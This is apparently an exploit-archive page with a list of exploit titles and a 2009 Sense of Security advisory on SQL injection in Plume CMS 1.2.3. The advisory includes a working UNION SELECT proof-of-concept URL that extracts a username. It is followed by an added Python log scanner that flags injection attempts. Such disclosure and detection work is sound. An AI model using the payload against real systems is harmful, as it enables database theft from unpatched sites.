
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow 
Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
Plume CMS Multiple SQL Injection Vulnerabilities - Security Advisory - SOS-09-006

Release Date. 12-Aug-2009
Last Update. -
Vendor Notification Date. 16-Jun-2009
Product. Plume CMS
Platform. Independent
Affected versions. 1.2.3 (verified), possibly others
Severity Rating. High
Impact. Manipulation of data
Attack Vector. Remote with authentication
Solution Status. Unpatched
CVE reference. Not yet allocated

Details.

Plume CMS is a content management system written in PHP. The application
suffers from SQL injection vulnerabilities in index.php and tools.php, as it
fails to validate data supplied in the "m" variable of index.php before
being used in a SQL query. Additionally, the variable "id" of tools.php is
also vulnerable to the same type of attack.

SQL injection attacks can give an attacker access to backend database
contents, the ability to remotely execute system commands, or in some
circumstances the means to take control of the operating system hosting the
database.

Proof of Concept.
|
|
|
|
The below POC will return the first username from the users table:
|
|
/plume/manager/index.php?m=1 UNION SELECT
|
|
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,user_username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
|
|
FROM plume_users LIMIT 1,1--
|
|
|
|
|
|
|
|
Solution.

None.

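Because the advisory lists no fix, one interim check is to review web server access logs for non-numeric values in the two parameters it names. The following Python sketch is an added example, not part of the original advisory; it assumes both parameters normally carry plain integers and that logs use the common/combined request-line format, and the sample log lines (including the tools.php path) are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script name -> parameter the advisory reports as injectable.
WATCHED = {"index.php": "m", "tools.php": "id"}
# Assumption: legitimate values are plain integers (the advisory's PoC starts from m=1).
INTEGER = re.compile(r"\d+")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample access-log lines, for illustration only.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2009:10:00:01 +1000] "GET /plume/manager/index.php?m=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Aug/2009:10:00:07 +1000] "GET /plume/manager/index.php?m=1%20UNION%20SELECT%20NULL HTTP/1.1" 200 7311',
    '203.0.113.9 - - [12/Aug/2009:10:00:09 +1000] "GET /plume/manager/tools.php?id=3%2527 HTTP/1.1" 500 310',
    '203.0.113.5 - - [12/Aug/2009:10:00:12 +1000] "GET /plume/manager/news.php?id=abc HTTP/1.1" 200 2048',
]

def suspicious_value(path_and_query):
    """Return (script, param, decoded value) when a watched parameter is not an integer."""
    parts = urlsplit(path_and_query)
    script = parts.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return None
    for value in parse_qs(parts.query).get(param, []):
        value = unquote(value).strip()  # second decode exposes double-encoded input
        if not INTEGER.fullmatch(value):
            return (script, param, value)
    return None

def scan(log_lines):
    """Return (line number, script, param, value) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hit = suspicious_value(match.group(1)) if match else None
        if hit:
            hits.append((number,) + hit)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so values sent in a POST body are not covered by this check.
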
Discovered by.

SOS Labs.

About us.

Sense of Security is a leading provider of information security and risk
management solutions. Our team has expert skills in assessment and
assurance, strategy and architecture, and deployment through to ongoing
management. We are Australia's premier penetration testing company and
trusted IT security advisor to many of the country's largest organisations.

Sense of Security Pty Ltd
Level 3, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-09-006.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

# milw0rm.com [2009-08-12]